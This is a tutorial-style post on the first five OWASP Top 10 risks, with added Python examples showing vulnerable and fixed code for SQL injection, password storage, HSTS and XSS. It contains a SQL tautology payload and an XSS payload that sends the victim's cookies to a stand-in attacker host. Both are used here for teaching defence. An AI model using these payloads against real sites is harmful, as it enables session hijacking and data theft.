1. Injection
Exploitability score: Easy
Detectability score: Easy
Technical Impact score: Severe
What is it?
Code injection takes place when an attacker sends invalid (untrusted) data to the application as part of a command or query. The attacker's goal is to trick the application into executing unintended behaviour, either to extract information or to cause damage.
The most common injection types are:
- SQL
- OS command
- ORM
- LDAP
- OGNL injection or Expression Language (EL)
Example of an attack
The most common example is a SQL query that consumes untrusted data directly, concatenating it into the query string.
The query can be exploited by modifying the “id” parameter value so that the WHERE clause matches every row: the application then returns all records from the accounts table instead of the one requested. Other, more severe injections can modify data or even destroy it.
How to prevent it?
The main reason injections happen is a lack of validation and sanitisation of the data the application consumes. How to prevent injection depends on the technology used; in general, make sure the development team follows security requirements when writing code.
Prevent code injection by following these two important points:
- The key to prevention is to keep data separate from commands and queries.
- Use a safe API, such as parameterized queries or prepared statements (or an ORM that binds parameters), so the database never interprets user data as SQL. Input validation and escaping are secondary defences, not a substitute.
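The contrast above, as an added example that is not part of the original post: the same account lookup written with string concatenation and with a parameterized query, run against an in-memory SQLite database so it can be executed offline. The table layout, the sample rows and the tautology payload are constructed for illustration.

```python
"""Added example (not from the original post): string-built SQL versus a
parameterized query, exercised with a classic tautology payload."""
import sqlite3

# Constructed sample data; the table and column names are assumptions.
SAMPLE_ROWS = [
    ("1001", "alice", 250.00),
    ("1002", "bob", 75.50),
    ("1003", "carol", 9000.00),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (custID TEXT, owner TEXT, balance REAL)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, cust_id):
    # Data and query are mixed: whatever the caller passes becomes part of the SQL.
    query = "SELECT custID, owner FROM accounts WHERE custID='" + cust_id + "'"
    return conn.execute(query).fetchall()


def lookup_safe(conn, cust_id):
    # Data is bound as a parameter; the driver never interprets it as SQL,
    # so the payload below is searched for literally and matches nothing.
    query = "SELECT custID, owner FROM accounts WHERE custID=?"
    return conn.execute(query, (cust_id,)).fetchall()


def demo():
    conn = make_db()
    payload = "' OR '1'='1"  # constructed payload: turns the WHERE clause into a tautology
    return {
        "honest_vuln": lookup_vulnerable(conn, "1002"),
        "honest_safe": lookup_safe(conn, "1002"),
        "attack_vuln": lookup_vulnerable(conn, payload),  # every account comes back
        "attack_safe": lookup_safe(conn, payload),        # no rows
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

With the payload the vulnerable query becomes `SELECT custID, owner FROM accounts WHERE custID='' OR '1'='1'`, which is exactly the "return all records" outcome described above; the parameterized version compares the column against the literal string and returns nothing.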
2. Broken Authentication
Exploitability score: Easy
Detectability score: Average
Technical Impact score: Severe
What is it?
Broken authentication is a class of vulnerabilities that lets attackers use manual or automated techniques to take over any account in a system, or even gain full control of it.
Example of an attack
“According to OWASP, “credential stuffing”, the use of lists of already known passwords, is one of the most common attacks. If an application does not rate limit authentication, the application can be used as a password oracle to determine whether the credentials are valid.”
How to prevent it?
The team must follow web-security best practices, back them with external security audits, and test the code before shipping it.
Other common pointers include:
- Do not ship or deploy with any default credentials, particularly for admin users.
- Store passwords with a modern, salted, adaptive hash function (Argon2, scrypt, bcrypt or PBKDF2), never in plain text or with a fast hash such as MD5 or SHA-1.
- Check new or changed passwords against a list of the top 10,000 worst passwords.
- Implement multi-factor authentication to prevent credential stuffing, brute force and stolen-credential attacks.
- Log authentication failures and alert administrators when credential stuffing, brute force or other attacks are detected.
- Limit or increasingly delay failed authentication attempts, per account and per source.
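The hashing, denylist and rate-limiting points above, as an added example that is not the post's own code: salted PBKDF2 password storage with a constant-time check, a weak-password denylist, and a per-account throttle that locks the account after repeated failures so the login endpoint stops working as a password oracle. The iteration count, the lockout parameters and the tiny denylist are assumptions standing in for production values.

```python
"""Added example (not from the original post): password hashing with
PBKDF2-HMAC-SHA256, a denylist check and a failed-login throttle."""
import hashlib
import hmac
import os
import time

PBKDF2_ITERATIONS = 600_000   # OWASP's current PBKDF2-HMAC-SHA256 recommendation
MAX_FAILURES = 5              # lock the account after this many failures ...
LOCKOUT_SECONDS = 15 * 60     # ... for this long (both values are assumptions)

# Constructed stand-in for the "top 10,000 worst passwords" list.
WEAK_PASSWORDS = {"123456", "password", "qwerty", "letmein", "welcome1"}


def is_weak(password: str) -> bool:
    return len(password) < 8 or password.lower() in WEAK_PASSWORDS


def hash_password(password: str, iterations: int = PBKDF2_ITERATIONS) -> str:
    """Return 'pbkdf2_sha256$iterations$salt$hash' with a fresh random salt."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(stored: str, candidate: str) -> bool:
    algo, iters, salt_hex, hash_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", candidate.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    # Constant-time comparison: does not leak how many bytes matched.
    return hmac.compare_digest(digest, bytes.fromhex(hash_hex))


class LoginThrottle:
    """Counts failures per username; 'clock' is injectable for testing."""

    def __init__(self, clock=time.time):
        self.clock = clock
        self.failures = {}  # username -> (count, time of first failure in window)

    def is_locked(self, username: str) -> bool:
        entry = self.failures.get(username)
        if not entry:
            return False
        count, first = entry
        if self.clock() - first > LOCKOUT_SECONDS:
            del self.failures[username]  # window expired, start over
            return False
        return count >= MAX_FAILURES

    def record(self, username: str, success: bool) -> None:
        if success:
            self.failures.pop(username, None)
            return
        count, first = self.failures.get(username, (0, self.clock()))
        self.failures[username] = (count + 1, first)


def login(users: dict, throttle: LoginThrottle, username: str, password: str) -> str:
    """Return 'locked', 'ok' or 'denied'. Unknown users get the same 'denied'
    as a wrong password so the response does not reveal which usernames exist."""
    if throttle.is_locked(username):
        return "locked"
    stored = users.get(username)
    ok = stored is not None and verify_password(stored, password)
    throttle.record(username, ok)
    return "ok" if ok else "denied"
```

The throttle here is per account; a production deployment also counts failures per source address and feeds the failure log to alerting, as the list above says. The lockout answer is returned before the password is checked, so a locked account cannot be used as an oracle at all during the window.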
3. Sensitive Data Exposure
Exploitability score: Average
Detectability score: Average
Technical Impact score: Severe
What is it?
Sensitive data exposure is one of the most common vulnerabilities to exploit. It consists of an attacker compromising data that should have been protected: credit card numbers, passwords, social security numbers, health records and other PII (personally identifiable information).
Example of an attack
This situation arises when a site doesn't use or enforce TLS for all of its pages, or uses weak encryption.
“An attacker can simply monitor the network traffic, intercept the TLS connection, and steal the user's session cookie. The attacker then replays this cookie and hijacks the user's (authenticated) session, accessing or modifying the user's private data. This attack can be modified in other ways, such as changing the recipient of a money transfer.”
How to prevent it?
Data should be protected at all times, both in transit and at rest. Failing to encrypt data is the main reason these attacks are so common. The weak points are usually:
- Password hashing and storage
- Key generation process
- Key management
- Protocol usage
Some other pointers:
- Classify the data stored, processed or transmitted by the application, and apply controls according to the classification.
- Avoid storing sensitive data you do not need; data you do not retain cannot be stolen.
- Encrypt all sensitive data at rest.
- Ensure up-to-date, strong algorithms, protocols and keys are in place, and use proper key management.
- Encrypt all data in transit with secure protocols such as TLS, using perfect forward secrecy (PFS) ciphers, server-side cipher prioritization and secure parameters.
- Enforce encryption with directives such as HTTP Strict Transport Security (HSTS).
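The HSTS directive and the session-cookie hijack above, as an added example that is not part of the original post: the transport-hardening headers a site should send on every HTTPS response, and a small audit that flags a response missing them (no HSTS, or a session cookie without the Secure and HttpOnly flags). Both sample responses are constructed, not captured, and the one-year max-age floor is an assumption.

```python
"""Added example (not from the original post): auditing a response for HSTS
and for Secure/HttpOnly flags on its cookies."""

ONE_YEAR = 31536000  # HSTS max-age floor used by the audit (an assumption)

# Constructed: a response that sets its session cookie with no protective flags
WEAK_RESPONSE = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Set-Cookie", "session=8f2c...; Path=/"),
]

# Constructed: the same response with HSTS and cookie flags applied
HARDENED_RESPONSE = [
    ("Content-Type", "text/html; charset=utf-8"),
    # A browser that has seen this header refuses plain HTTP to the host
    # (and its subdomains) for two years, so an HTTPS->HTTP downgrade never happens.
    ("Strict-Transport-Security", "max-age=63072000; includeSubDomains; preload"),
    # Secure: never sent over HTTP.  HttpOnly: not readable by injected script.
    ("Set-Cookie", "session=8f2c...; Secure; HttpOnly; SameSite=Lax; Path=/"),
]


def cookie_attrs(set_cookie: str) -> set:
    """Lower-cased attribute names that follow the name=value pair."""
    return {p.strip().split("=", 1)[0].lower()
            for p in set_cookie.split(";")[1:] if p.strip()}


def audit_headers(headers: list) -> list:
    """Return findings for a list of (name, value) header pairs; [] means clean."""
    findings = []
    hsts = [v for k, v in headers if k.lower() == "strict-transport-security"]
    if not hsts:
        findings.append("missing Strict-Transport-Security header")
    else:
        directives = {d.strip().lower() for d in hsts[0].split(";")}
        max_age = next((d for d in directives if d.startswith("max-age=")), "max-age=0")
        if int(max_age.split("=", 1)[1]) < ONE_YEAR:
            findings.append("HSTS max-age is shorter than one year")
        if "includesubdomains" not in directives:
            findings.append("HSTS does not cover subdomains")
    for k, v in headers:
        if k.lower() != "set-cookie":
            continue
        name = v.split("=", 1)[0].strip()
        attrs = cookie_attrs(v)
        for attr, label in (("secure", "Secure"), ("httponly", "HttpOnly")):
            if attr not in attrs:
                findings.append("cookie %r lacks the %s flag" % (name, label))
    return findings


if __name__ == "__main__":
    print("weak:", audit_headers(WEAK_RESPONSE))
    print("hardened:", audit_headers(HARDENED_RESPONSE))
```

The cipher suite, PFS and protocol-version choices from the list belong in the TLS terminator's configuration and are not visible in response headers, so this audit covers only the part the application itself controls.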
4. XML External Entities (XXE)
Exploitability score: Average
Detectability score: Easy
Technical Impact score: Severe
What is it?
An XXE attack targets an application that parses XML input. It occurs when the XML input contains a reference to an external entity and that reference is processed by a weakly configured XML parser, which may then read local files, make requests to internal systems or exhaust resources on the attacker's behalf.
Example of an attack
[Figure: an HTTP request carrying an XML body whose DTD declares an external entity; the malicious entity is circled in red.]
How to prevent it?
- Many XML parsers are vulnerable to XXE in their default configuration. That is why it is so important to have well-trained developers who can identify and mitigate the risk.
- The best way to prevent XXE is to disable DTDs (and therefore external entities) completely; the exact configuration depends on the parser. Where DTDs cannot be disabled, disable external entity resolution and XInclude support.
- Disabling DTDs also protects the parser against entity-expansion denial of service (the “billion laughs” attack).
5. Cross-Site Scripting (XSS)
Exploitability score: Easy
Detectability score: Easy
Technical Impact score: Moderate
What is it?
Cross-Site Scripting is among the most common vulnerabilities affecting web applications. XSS attacks are client-side injections: malicious script added to a web page or app through user comments, form submissions, URL parameters and so on, and then executed in other users' browsers.
Example of an attack
The application uses untrusted data to construct an HTML snippet without validation or escaping.
The attacker modifies the ‘CC’ parameter in the browser so that it breaks out of the HTML attribute and injects a script tag.
The XSS payload causes the victim's session ID to be sent to the attacker's website, allowing the attacker to hijack the victim's current session.
How to prevent it?
- Use frameworks that automatically escape output for XSS by design, such as React JS or the latest Ruby on Rails.
- Escape untrusted HTTP request data according to the context in which it lands in the HTML output (body, attribute, JavaScript, CSS or URL) to resolve reflected and stored XSS vulnerabilities.
- Enable a Content Security Policy (CSP) as a defence-in-depth mitigation. It assumes that no other vulnerability exists that would allow malicious code to be placed through local files, for example path-traversal overwrites or vulnerable libraries hosted on a permitted source such as a content delivery network.
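The ‘CC’ example and the context-aware escaping rule above, as an added example that is not part of the original post: the vulnerable snippet rendering the parameter raw, beside escaping functions for the attribute, body, JavaScript and URL contexts. The cookie-stealing payload, the attacker hostname and the template are constructed for illustration; the CSP value is one reasonable default, not the post's.

```python
"""Added example (not from the original post): raw rendering of an untrusted
parameter versus escaping chosen per output context."""
import html
import json
from urllib.parse import urlsplit

# Constructed payload of the kind the text describes: closes the value
# attribute, then ships document.cookie to the attacker's host.
PAYLOAD = "'><script>location='https://attacker.example/?c='+document.cookie</script>"

# Defence in depth: scripts only from our own origin, no plugins.
CSP_HEADER = "default-src 'self'; script-src 'self'; object-src 'none'"


def render_vulnerable(cc: str) -> str:
    # Untrusted data dropped straight into HTML: the leading quote ends the
    # attribute and the <script> element runs in the victim's browser.
    return "<input name='creditcard' type='TEXT' value='" + cc + "'>"


def html_attr(value: str) -> str:
    # Escapes & < > " and ' so the value cannot leave a quoted attribute.
    return html.escape(value, quote=True)


def html_body(value: str) -> str:
    return html.escape(value, quote=False)


def js_string(value: str) -> str:
    # JSON encoding keeps the value a JavaScript string literal; escaping "</"
    # stops a "</script>" inside the data from closing the script element.
    return json.dumps(value).replace("</", "<\\/")


def safe_url(value: str) -> str:
    # URL context: escaping cannot neutralise "javascript:" or "data:" URLs,
    # so allow only http(s) or a same-site absolute path; otherwise neutralise.
    value = value.strip()
    if value.startswith("/") and not value.startswith("//"):
        return value
    if urlsplit(value).scheme.lower() in ("http", "https"):
        return value
    return "#"


def render_safe(cc: str, next_url: str) -> str:
    return (
        "<input name='creditcard' type='TEXT' value='%s'>\n"
        "<p>Card ending %s</p>\n"
        "<a href='%s'>Continue</a>\n"
        "<script>var cc = %s;</script>"
    ) % (html_attr(cc), html_body(cc[-4:]), html_attr(safe_url(next_url)), js_string(cc))


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_safe(PAYLOAD, "javascript:alert(1)"))
```

Note that `safe_url` validates rather than escapes: a `javascript:` URL is perfectly well-formed attribute content, so the attribute escaper alone would let it through. Each escaper is applied at the point of output, which is what the "escape by context" bullet above asks for.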
best regards!
learnwithacmounta